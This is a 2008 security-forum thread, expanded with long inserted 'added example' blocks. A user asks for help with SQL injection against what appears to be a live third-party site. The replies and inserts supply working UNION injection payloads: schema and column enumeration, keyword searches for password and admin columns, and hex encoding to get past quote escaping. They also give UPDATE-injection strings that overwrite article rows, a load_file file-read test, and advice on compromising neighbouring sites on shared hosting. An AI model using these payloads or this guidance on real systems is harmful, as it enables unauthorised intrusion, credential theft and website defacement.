IT Security and Insecurity Portal
pro in SQL injection ??

Posted: Fri Jan 25, 2008 11:50 am

nox
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32
Hi,
I found an SQL injection exploit. When I go to INFORMATION_SCHEMA.TABLES
I find all the DB tables:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
m_type
mbb
poll
poll_data
dt_1
test1
When I put: FROM article
I find all the article IDs,
but when I put: FROM USER_PRIVILEGES
Query failed == 1146: Table 'marketviews2.USER_PRIVILEGES' doesn't exist
Please help me?
_________________ ..::::[ Waraxe.us is the BEST and the TOP ]::::..
Posted: Fri Jan 25, 2008 5:26 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
You see all the table names from all the databases you currently have access to. So those tables are coming from at least 2 databases: "INFORMATION_SCHEMA" and "marketviews2". Table "USER_PRIVILEGES" resides in the "INFORMATION_SCHEMA" database, not in your current database.
In your specific case, all UPPERCASE tables seem to be coming from "INFORMATION_SCHEMA" and the lowercase tables are in the current database.
So "USER_PRIVILEGES" can be accessed as "INFORMATION_SCHEMA.USER_PRIVILEGES"
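As an added example (not part of waraxe's reply or of nox's payloads), the same enumeration done with the owning schema next to each table name, so the two databases are told apart by the query rather than by letter case. It assumes the injection point and 10-column UNION layout nox already confirmed, where the 2nd and 10th columns are echoed back; /article.php?ID= is used as a placeholder for the injectable parameter.

```sql
-- Added example, not code from the thread. Assumes nox's confirmed injection
-- point and 10-column UNION layout (2nd and 10th columns are displayed);
-- /article.php?ID= is a placeholder for the injectable parameter.

-- 0. Fingerprint first: VERSION() decides whether INFORMATION_SCHEMA exists
--    at all (5.0+), USER() is the account the web app connects as, and
--    DATABASE() is the schema that unqualified table names resolve against
--    (marketviews2 in nox's case).
SELECT VERSION(), USER(), DATABASE();
-- /article.php?ID=-999 UNION SELECT 0,CONCAT(VERSION(),':',USER(),':',DATABASE()),2,3,4,5,6,7,8,9

-- 1. Every schema this account can see. INFORMATION_SCHEMA is always listed;
--    the mysql schema only shows up when the account holds privileges on it
--    (nox's table list contains none of the mysql.* tables, so that schema
--    is not visible to this account).
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

-- 2. Tables with their owning schema. Restricting TABLE_SCHEMA to the
--    current database makes the uppercase/lowercase guess unnecessary and
--    leaves only the application's own tables.
SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA = DATABASE()
ORDER BY TABLE_NAME;

-- 3. The same list folded into one value, for pages that display only a
--    single row. GROUP_CONCAT output is truncated at group_concat_max_len
--    (1024 bytes by default), so page through long lists with LIMIT instead.
-- /article.php?ID=-999 UNION SELECT 0,GROUP_CONCAT(TABLE_NAME),2,3,4,5,6,7,8,9 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()
SELECT GROUP_CONCAT(CONCAT(TABLE_SCHEMA, '.', TABLE_NAME) SEPARATOR ', ')
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA <> 'information_schema';

-- 4. The table that raised error 1146. It lives in INFORMATION_SCHEMA, so
--    the name must be qualified; left unqualified it resolves to
--    marketviews2.USER_PRIVILEGES, which does not exist.
SELECT GRANTEE, PRIVILEGE_TYPE, IS_GRANTABLE
FROM INFORMATION_SCHEMA.USER_PRIVILEGES;
```

Query 2 is the one to run first: TABLE_ROWS tells you which tables are worth reading before you spend requests on them.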
Posted: Sat Jan 26, 2008 10:31 am

nox
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32
Thanks, it works 100%, but I can't find the names of the password and user columns.
Look here:
from information_schema.TABLES
Code:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
msn_type
msnbb
poll
poll_data
dt_1
test1
mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE   | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL          | USAGE          | NO           |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)
Code:
/article.php?ID=-999 UNION SELECT 0,GRANTEE,2,3,4,5,6,7,8,IS_GRANTABLE FROM information_schema.USER_PRIVILEGES;
I find: 'KK1'@'%' and NO
PLEASE, how can I find the PASSWORD?????
Look here please: http://www.xfocus.net/articles/200601/847.html
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| VIEWS                                 |
| USER_PRIVILEGES                       |
+---------------------------------------+
16 rows in set (0.17 sec)
mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE   | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL          | USAGE          | NO           |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)
mysql> select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATISTICS;
+--------------+------------+-------------+
| TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME |
+--------------+------------+-------------+
| in           | article    | articleid   |
| in           | user       | userid      |
+--------------+------------+-------------+
2 rows in set (0.02 sec)
D:\mysql5\bin>mysql -uroot -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.18
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use in
Database changed
mysql> delimiter //
mysql> CREATE PROCEDURE test(id INT)
    -> BEGIN
    -> SELECT * FROM in.USER WHERE USERID=ID;
    -> END//
Query OK, 0 rows affected (0.08 sec)
mysql> delimiter ;
mysql> call test(1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      1 | angel    | mypass   |
+--------+----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
a. SQL Injection
mysql> call test(1 and 1=1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      1 | angel    | mypass   |
+--------+----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.01 sec)
mysql> call test(1 and 1=2);
Empty set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
mysql> grant SELECT, INSERT, UPDATE, DELETE, EXECUTE
    -> ON `IN`.*
    -> TO 'KK1'@'%'
    -> IDENTIFIED BY 'OBSCURE';
Query OK, 0 rows affected (0.03 sec)
SELECT, INSERT, UPDATE, DELETE, EXECUTE
D:\mysql5\bin>mysql -uKK1 -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5 to server version: 5.0.18
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select ROUTINE_SCHEMA,ROUTINE_NAME,DEFINER,ROUTINE_DEFINITION from information_schema.ROUTINES;
+----------------+--------------+----------------+--------------------+
| ROUTINE_SCHEMA | ROUTINE_NAME | DEFINER        | ROUTINE_DEFINITION |
+----------------+--------------+----------------+--------------------+
| in             | test         | root@localhost |                    |
| in             | tt           | root@localhost |                    |
+----------------+--------------+----------------+--------------------+
2 rows in set (0.01 sec)
mysql> call in.test(1 and length(load_file('c:/boot.ini'))>0);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      1 | angel    | mypass   |
+--------+----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.01 sec)
mysql> call in.test(1 and length(load_file('c:/boot.ini'))<0);
Empty set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
HELP ME WARAXE PLEASE
Posted: Sat Jan 26, 2008 1:28 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
I don't think that you will find any names or passwords in "INFORMATION_SCHEMA". The next move can be COLUMNS enumeration.
Code:
/article.php?ID=-1 UNION ALL SELECT 0,TABLE_NAME,2,3,4,5,6,7,8,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;
Then search for table names and column names which seem to be related to the web application's auth - anything like "user", "pass", "admin", "login", "account", "email", "editor", "customer", ...
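As an added example (not waraxe's own payload), the column enumeration narrowed to the current database and then to names that look credential-related, so the keyword search is done by the server instead of by eye. It assumes the same 10-column UNION layout (2nd and 10th columns displayed) and the /article.php?ID= placeholder; the keyword lists are mine, extended from the ones waraxe suggests.

```sql
-- Added example, not code from the thread. Same assumed 10-column UNION
-- layout (2nd and 10th columns displayed); /article.php?ID= is a placeholder.

-- 1. Columns of the current database only, one table per row, in definition
--    order. Restricting TABLE_SCHEMA keeps INFORMATION_SCHEMA's own few
--    hundred columns out of the output.
SELECT TABLE_NAME,
       GROUP_CONCAT(COLUMN_NAME ORDER BY ORDINAL_POSITION SEPARATOR ',') AS cols
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = DATABASE()
GROUP BY TABLE_NAME;

-- 2. Keyword search across every schema the account can see, since a login
--    table may live in a second database. REGEXP is case-insensitive on
--    non-binary strings, so User, PASS and Admin all match. The keyword
--    lists are an assumption; extend them to the application's vocabulary.
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, COLUMN_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA <> 'information_schema'
  AND (COLUMN_NAME REGEXP 'user|pass|pwd|admin|login|account|email|editor|customer'
       OR TABLE_NAME REGEXP 'user|admin|login|account|member|customer|author')
ORDER BY TABLE_SCHEMA, TABLE_NAME, ORDINAL_POSITION;

-- 3. Injected form of query 2, everything folded into the displayed column.
--    LIMIT walks the hits one per request; raise the offset until the page
--    comes back empty.
-- /article.php?ID=-1 UNION ALL SELECT 0,CONCAT(TABLE_SCHEMA,'.',TABLE_NAME,'.',COLUMN_NAME,' ',COLUMN_TYPE),2,3,4,5,6,7,8,9 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA<>'information_schema' AND (COLUMN_NAME REGEXP 'user|pass|admin|login' OR TABLE_NAME REGEXP 'user|admin|login|member') LIMIT 0,1

-- 4. If the application escapes quotes (magic_quotes_gpc), write the string
--    literals as hex instead: 0x75736572 is 'user'. Hex literals are binary
--    strings, so the REGEXP match then becomes case-sensitive.
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME
FROM INFORMATION_SCHEMA.COLUMNS
WHERE COLUMN_NAME REGEXP 0x75736572;
```

Query 1 is the one to keep: once you know which table holds the login, the same output gives you the exact column names and their order for the UNION that reads it.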
Posted: Sat Jan 26, 2008 1:33 pm

nox
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32
OK, I didn't find the password; now I want to edit article.php.
The UPDATE command?
/UNION SELECT 0,1,2,3,4,5,6,7 FROM article--
It works.
All the column names of Article: title, .....
article:id
article:title
article:author_id
article:date_id
article:add_date
article:edit_date
article:intro
article:body
article:sort
article:link
article:image
article:type
article:status
article:sn_type
article:sn_status
Now tell me how I can edit an article [HTML] with UPDATE.
Thanks for everything, waraxe
Posted: Sat Jan 26, 2008 1:44 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
It's MySQL 5.x, right??
Then you can't use multiple queries in SQL injection. Database modification can be done only with other methods:
1. Find an SQL injection in an UPDATE query which handles the right table.
2. Get PHP-level access and execute your own SQL queries.
3. Find out the database credentials and, if port 3306 is open to the world, try to manipulate the database remotely (in most cases impossible, because the MySQL port usually is not open outside the internal network perimeter).
4. If the web application has an admin/editor backend interface, try to log in and make the needed changes. Or elevate privileges from webapp admin/editor/author/moderator/etc. to PHP code execution and then use your own SQL queries.
5. If the website is located on a shared hosting server, then look for neighbour websites on the same server and try to find the weakest link in order to get access to the server. If the hosting server's security measures are not tight enough, then you may be able to get access to all the other websites' files and databases ...
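As an added example (hypothetical, not from the thread or from the target), the difference between the SELECT-context injection nox has and the UPDATE-context injection waraxe's option 1 calls for. The editor-side UPDATE statement and its parameters ($title, $id, $author) are made up for illustration; the article columns are the ones nox listed.

```sql
-- Added example, not code from the thread. The editor-side UPDATE and its
-- parameters ($title, $id, $author) are hypothetical; the article columns
-- are those nox enumerated.

-- A. What nox has: a SELECT that the page builds by concatenating ID. A UNION
--    can only add rows to that SELECT's result; it cannot change data.
--    Appending a second statement does not help through PHP's mysql_query(),
--    which sends one statement without the multi-statements flag, so the
--    server parses the whole string as one statement and rejects it:
--
--    SELECT * FROM article WHERE id=-1 UNION SELECT 0,1,2,3,4,5,6,7,8,9; UPDATE article SET body='x' WHERE id=1
--    -> ERROR 1064 (42000): You have an error in your SQL syntax ... near '; UPDATE article SET body='x' WHERE id=1'
--
--    Two caveats: the mysql command-line client splits on ';' itself and would
--    run both, so a CLI test proves nothing about the web app; and the limit
--    is the API, not MySQL 5: mysqli_multi_query() and PDO's MySQL driver do
--    accept stacked statements.

-- B. What option 1 means: find a place where user input reaches an UPDATE on
--    the table you care about. A hypothetical editor form running
--
--    UPDATE article SET title='$title', edit_date=NOW() WHERE id=$id AND author_id=$author
--
--    with $title unescaped turns a submitted title of
--      x', body='<b>replaced</b>', status=1 WHERE id=7 --
--    into this statement, which overwrites row 7 whoever its author is
--    (the original tail is commented out by the trailing "-- "):
UPDATE article
SET title = 'x', body = '<b>replaced</b>', status = 1
WHERE id = 7; -- ', edit_date=NOW() WHERE id=7 AND author_id=3

-- C. The same with no quotes, for when magic_quotes escapes them: an
--    injectable numeric parameter in the WHERE clause widens the update to
--    more rows than the form intended. With $id unescaped, a value of
--      7 OR 1=1
--    gives:
UPDATE article SET title = 'x', edit_date = NOW()
WHERE id = 7 OR 1=1 AND author_id = 3;
-- Precedence trap: AND binds tighter than OR, so this reads as
-- id=7 OR (1=1 AND author_id=3), i.e. every article by author 3, not every
-- article. Check the "Rows matched"/"Changed" count before assuming what
-- the statement touched.
```

Part C is also the check to run on the application side: any UPDATE or DELETE whose WHERE clause takes a number straight from the request is a candidate for option 1 even when quotes are filtered.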
Powered by phpBB © 2001-2008 phpBB Group